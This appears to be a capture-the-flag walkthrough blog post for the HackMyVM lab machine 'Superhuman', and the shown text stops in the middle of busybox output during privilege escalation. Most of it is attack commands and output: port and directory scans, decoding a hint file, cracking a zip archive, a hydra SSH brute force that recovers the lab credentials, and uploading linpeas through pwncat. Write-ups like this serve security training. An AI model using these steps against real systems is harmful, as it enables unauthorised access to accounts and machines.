{"id":524,"date":"2024-04-11T13:12:02","date_gmt":"2024-04-11T05:12:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=524"},"modified":"2024-04-11T13:12:02","modified_gmt":"2024-04-11T05:12:02","slug":"hmv-_-superhuman","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/524\/04\/11\/2024\/","title":{"rendered":"hmv[-_-]Superhuman"},"content":{"rendered":"<h1>Superhuman<\/h1>\n<p>This morning I found that the player who was in second place yesterday had already gained more than 80 points on me, so it is time to work overtime, hahaha.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311992.png\" alt=\"image-20240411114812462\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV -p 1-65535 172.20.10.5<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)\n|   256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)\n|_  256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.38 ((Debian))\n|_http-title: Site doesn&#039;t have a title 
(text\/html).\n|_http-server-header: Apache\/2.4.38 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code>gobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">\/server-status        (Status: 403) [Size: 276]\nProgress: 1543920 \/ 1543927 (100.00%)<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.5<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.5\n+ Target Hostname:    172.20.10.5\n+ Target Port:        80\n+ Start Time:         2024-04-10 23:51:04 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 292, size: 5bed1a5d204c0, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/icons\/README: Apache default file found. 
See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host\n+ End Time:           2024-04-10 23:51:28 (GMT-4) (24 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Exploitation<\/h2>\n<h3>Reconnaissance<\/h3>\n<pre><code class=\"language-html\">&lt;html&gt;&lt;head&gt;\n&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text\/html; charset=windows-1252&quot;&gt;&lt;\/head&gt;&lt;body&gt;&lt;p&gt;&lt;img src=&quot;index_fichiers\/nietzsche.jpg&quot; alt=&quot;&quot; style=&quot;display: block; margin-left: auto; margin-right: auto;&quot;&gt;&lt;\/p&gt;\n&lt;!-- scroll to the very bottom --&gt;\n&lt;!-- If your eye was sharper, you would see everything in motion, lol --&gt;\n&lt;\/body&gt;&lt;\/html&gt;<\/code><\/pre>\n<p>Nothing else here, sigh. Take a look at this image:<\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/nietzsche.jpg<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311994.png\" alt=\"image-20240411115551882\" style=\"zoom:33%;\" \/><\/p>\n<p>Nietzsche? Download it and check whether anything is hidden with steganography:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311996.png\" alt=\"image-20240411115822940\" style=\"zoom:50%;\" \/><\/p>\n<p>There seems to be, but our wordlist attack could not crack it. Hold on: first fuzz the directories in the background and try other wordlists:<\/p>\n<p>No wordlist turned up anything by fuzzing....<\/p>\n<h3>Information Gathering<\/h3>\n<p>Try fuzzing the directories:<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/172.20.10.5\/FUZZ -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -e php,txt,zip<\/code><\/pre>\n<p>While that was idle, I simply reran <code>gobuster<\/code> with a different wordlist:<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -x php,zip,git,jpg,txt<\/code><\/pre>\n<p>fuzz results:<\/p>\n<pre><code class=\"language-text\">server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 26ms]<\/code><\/pre>\n<p><code>gobuster<\/code> found something!<\/p>\n<pre><code 
class=\"language-bash\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.5\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,php,zip,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server-status        (Status: 403) [Size: 276]\n\/notes-tips.txt       (Status: 200) [Size: 358]\n\/nietzsche.jpg        (Status: 200) [Size: 22211]\nProgress: 7642998 \/ 7643004 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Drop what we found into <code>cyberchef<\/code> to decode it:<\/p>\n<pre><code class=\"language-bash\">http:\/\/172.20.10.5\/notes-tips.txt\nF(&amp;m&#039;D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC\/g+jUD&#039;3nBEb-A+De&#039;u)F!,&quot;)@:UuC\/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@&lt;HBpDImi@\/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D&gt;AKYYtEZed5E,T&lt;)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&amp;m&#039;D.R&#039;_DId*=59NN?A8c?5F&lt;G@:Dg*f@$:u@WF`VXIDJsV&gt;AoD^&amp;ATT&amp;:D]j+0G%De1F&lt;G&quot;0A0&gt;i6F&lt;G!7B5_^!+D#e&gt;ASuR&#039;Df-\\,ARf.kF(HIc+CoD.-ZgJE@&lt;Q3)D09?%+EMXCEa`Tl\/c<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311997.png\" alt=\"image-20240411123634329\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311998.png\" alt=\"image-20240411123830079\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-text\">salome doesn&#039;t want me, I&#039;m so sad... i&#039;m sure god is dead... \nI drank 6 liters of Paulaner.... too drunk lol. I&#039;ll write her a poem and she&#039;ll desire me. I&#039;ll name it salome_and_?? 
I don&#039;t know.\n\nI must not forget to save it and put a good extension because I don&#039;t have much storage.<\/code><\/pre>\n<p>That gives us the sensitive file name: <code>salome_and_me.zip<\/code><\/p>\n<blockquote>\n<p>Because the note goes on to say there is not much storage left.<\/p>\n<\/blockquote>\n<p>Request the file:<\/p>\n<pre><code class=\"language-bash\">wget http:\/\/172.20.10.5\/salome_and_me.zip<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311999.png\" alt=\"image-20240411124304803\" style=\"zoom:50%;\" \/><\/p>\n<p>Cracked it!<\/p>\n<pre><code class=\"language-apl\">turtle<\/code><\/pre>\n<pre><code class=\"language-apl\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ cat salome_and_me.txt \n----------------------------------------------------\n             GREAT POEM FOR SALOME\n----------------------------------------------------\nMy name is fred,\nAnd tonight I&#039;m sad, lonely and scared,\nBecause my love Salome prefers schopenhauer, asshole,\nI hate him he&#039;s stupid, ugly and a peephole,\nMy darling I offered you a great switch,\nAnd now you reject my love, bitch\nI don&#039;t give a fuck, I&#039;ll go with another lady,\nAnd she&#039;ll call me 
BABY!<\/code><\/pre>\n<p>Hilarious, the poor guy.<\/p>\n<pre><code class=\"language-apl\">fred\nSalome\nschopenhauer<\/code><\/pre>\n<p>Try logging in:<\/p>\n<pre><code>echo &quot;fred\\nSalome\\nschopenhauer&quot; &gt; fuck.txt<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ hydra -L fuck.txt -P fuck.txt ssh:\/\/172.20.10.5                                                                              \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 00:49:08\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3\/p:3), ~1 try per task\n[DATA] attacking ssh:\/\/172.20.10.5:22\/\n[22][ssh] host: 172.20.10.5   login: fred   password: schopenhauer\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-11 00:49:13<\/code><\/pre>\n<pre><code class=\"language-apl\">fred\nschopenhauer<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311000.png\" alt=\"image-20240411125057805\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) fred@superhuman:\/home\/fred$ whoami;id\nfred\nuid=1000(fred) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n(remote) fred@superhuman:\/home\/fred$ pwd\n\/home\/fred\n(remote) fred@superhuman:\/home\/fred$ ls -la\nlol<\/code><\/pre>\n<p>Then the session dropped. What, I cannot use ls?<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ pwncat-cs fred@172.20.10.5 2&gt;\/dev\/null\n[00:52:46] Welcome to pwncat \ud83d\udc08!                                                                                                         __main__.py:164\nPassword: ************\n[00:52:47] 172.20.10.5:22: normalizing shell path                                                                                         manager.py:957           172.20.10.5:22: registered new host w\/ db                                                                                      manager.py:957\n(local) pwncat$                                                                                                                                         \n(remote) fred@superhuman:\/home\/fred$ cat user.txt \nIneedmorepower\n(remote) fred@superhuman:\/home\/fred$ echo *\ncmd.txt user.txt\n(remote) fred@superhuman:\/home\/fred$ cat cmd.txt \n&quot;ls&quot; command has a new name ?!! 
WTF !\n(remote) fred@superhuman:\/home\/fred$ WTF -la\n-bash: WTF: command not found\n(remote) fred@superhuman:\/home\/fred$ find \/-perm -u=s -type f 2&gt;\/dev\/null\n(remote) fred@superhuman:\/home\/fred$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn<\/code><\/pre>\n<p>\u4e0a\u4f20<code>linpeas.sh<\/code>\u901f\u901a\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) fred@superhuman:\/home\/fred$ cd \/tmp\n(remote) fred@superhuman:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/superhuman\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? 
\u2022 0:00:00[00:59:10] uploaded 860.55KiB in 0.71 seconds                                                                                               upload.py:76\n(local) pwncat$                                                                                                                                         \n(remote) fred@superhuman:\/tmp$ chmod +x linpeas.sh \n(remote) fred@superhuman:\/tmp$ .\/linpeas.sh \n\n                            \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n                    \u2584\u2584\u2584\u2584\u2584\u2584\u2584             \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n             \u2584\u2584\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584     \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584    \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584       \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584          \u2584\u2584\u2584\u2584\u2584\u2584               \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584              \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            
     \u2584\u2584\u2584\u2584 \n         \u2584\u2584                  \u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584                  \u2584\u2584\u2584\n         \u2584\u2584                \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                  \u2584\u2584\n         \u2584            \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584   \u2584\u2584\n         \u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                                \u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584                       \u2584\u2584\u2584\u2584\u2584\u2584     \u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584                       \u2584\u2584\u2584\u2584\u2584      \u2584 \u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584        \u2584\u2584\u2584\u2584\u2584\u2584\u2584        \u2584\u2584\u2584\u2584\u2584     \u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584 \n          \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584        \u2584          \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                
       \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n          \u2580\u2580\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\u2580\u2580\u2580\n               \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\n                     \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\n\n    \/---------------------------------------------------------------------------------\\\n    |                             Do you like PEASS?                                  |\n    |---------------------------------------------------------------------------------|\n    |         Get the latest version    :     https:\/\/github.com\/sponsors\/carlospolop |\n    |         Follow on Twitter         :     @hacktricks_live                        |\n    |         Respect on HTB            :     SirBroccoli                             |\n    |---------------------------------------------------------------------------------|\n    |                                 Thank you!                                      
|\n    \\---------------------------------------------------------------------------------\/\n          linpeas-ng by carlospolop\n\nADVISORY: This script should be used for authorized penetration testing and\/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and\/or with the computer owner&#039;s permission.\n\nLinux Privesc Checklist: https:\/\/book.hacktricks.xyz\/linux-hardening\/linux-privilege-escalation-checklist\n LEGEND:\n  RED\/YELLOW: 95% a PE vector\n  RED: You should take a look to it\n  LightCyan: Users with console\n  Blue: Users without console &amp; mounted devs\n  Green: Common things (users, groups, SUID\/SGID, mounts, .sh scripts, cronjobs) \n  LightMagenta: Your username\n\n Starting linpeas. Caching Writable Folders...\n\n                               \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Basic information \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n                               \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\nOS: Linux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)\nUser &amp; Groups: uid=1000(fred) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\nHostname: superhuman\nWritable folder: \/dev\/shm\n[+] \/usr\/bin\/ping is available for network discovery (linpeas can 
discover hosts, learn more with -h)\n[+] \/usr\/bin\/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)\n[+] \/usr\/bin\/nc is available for network discovery &amp; port scanning (linpeas can discover hosts and scan ports, learn more with -h)\nCaching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE\n                              \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 System Information \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n                              \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Operative system\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#kernel-exploits\nLinux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)\nDistributor ID: Debian\nDescription:    Debian GNU\/Linux 10 (buster)\nRelease:        10\nCodename:       buster\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Sudo version\nsudo Not Found\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 PATH\n\u255a 
https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#writable-path-abuses\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Date &amp; uptime\nThu 11 Apr 2024 12:59:27 AM EDT\n 00:59:27 up  1:13,  1 user,  load average: 0.16, 0.39, 2.55\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Any sd*\/disk* disk in \/dev? (limit 20)\nKilled<\/code><\/pre>\n<p>Uh.... looks like I am the one who got speedrun....<\/p>\n<p>Gather information again:<\/p>\n<pre><code class=\"language-bash\">(remote) fred@superhuman:\/tmp$ echo *\nlinpeas.sh systemd-private-193640687eb64794bc31630a1457f638-apache2.service-0FkQXg systemd-private-193640687eb64794bc31630a1457f638-systemd-timesyncd.service-KTkU3P\n(remote) fred@superhuman:\/tmp$ cd \/\n(remote) fred@superhuman:\/$ echo *\nbin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old\n(remote) fred@superhuman:\/$ cd \/etc\n(remote) fred@superhuman:\/etc$ echo *\nadduser.conf adjtime alternatives apache2 apm apparmor apparmor.d apt bash.bashrc bash_completion bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf calendar console-setup cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fstab gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init.d initramfs-tools inputrc iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic 
magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d motd mtab nanorc network networks nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl profile profile.d protocols python python2.7 python3 python3.7 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services shadow shadow- shells skel ssh ssl subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim wgetrc X11 xattr.conf xdg\n(remote) fred@superhuman:\/etc$ cd \/opt;echo *\n*\n(remote) fred@superhuman:\/opt$ echo *\n*\n(remote) fred@superhuman:\/opt$ cd \/var\/www\/html\n(remote) fred@superhuman:\/var\/www\/html$ echo *\nindex.html nietzsche.jpg notes-tips.txt salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ busybox \nBusyBox v1.30.1 (Debian 1:1.30.1-4) multi-call binary.\nBusyBox is copyrighted by many authors between 1998-2015.\nLicensed under GPLv2. See source distribution for detailed\ncopyright notices.\n\nUsage: busybox [function [arguments]...]\n   or: busybox --list[-full]\n   or: busybox --show SCRIPT\n   or: busybox --install [-s] [DIR]\n   or: function [arguments]...\n\n        BusyBox is a multi-call binary that combines many common Unix\n        utilities into a single executable.  
Most people will create a\n        link to busybox for each function they wish to use and BusyBox\n        will act like whatever it was invoked as.\n\nCurrently defined functions:\n        [, [[, acpid, adjtimex, ar, arch, arp, arping, ash, awk, basename, bc, blkdiscard, blockdev, brctl, bunzip2, bzcat, bzip2, cal, cat, chgrp,\n        chmod, chown, chroot, chvt, clear, cmp, cp, cpio, cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem, df, diff, dirname, dmesg,\n        dnsdomainname, dos2unix, du, dumpkmap, dumpleases, echo, egrep, env, expand, expr, factor, fallocate, false, fatattr, fgrep, find, fold, free,\n        freeramdisk, fsfreeze, fstrim, ftpget, ftpput, getopt, getty, grep, groups, gunzip, gzip, halt, head, hexdump, hostid, hostname, httpd,\n        hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifdown, ifup, init, insmod, ionice, ip, ipcalc, ipneigh, kill, killall, klogd, last,\n        less, link, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread, losetup, ls, lsmod, lsscsi, lzcat, lzma, lzop,\n        md5sum, mdev, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mt, mv, nameif, nc,\n        netstat, nl, nologin, nproc, nsenter, nslookup, nuke, od, openvt, partprobe, paste, patch, pidof, ping, ping6, pivot_root, poweroff, printf,\n        ps, pwd, rdate, readlink, realpath, reboot, renice, reset, resume, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, run-init, run-parts, sed, seq,\n        setkeycodes, setpriv, setsid, sh, sha1sum, sha256sum, sha512sum, shred, shuf, sleep, sort, ssl_client, start-stop-daemon, stat, strings, stty,\n        svc, svok, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tee, telnet, test, tftp, time, timeout, top, touch,\n        tr, traceroute, traceroute6, true, truncate, tty, ubirename, udhcpc, udhcpd, uevent, umount, uname, 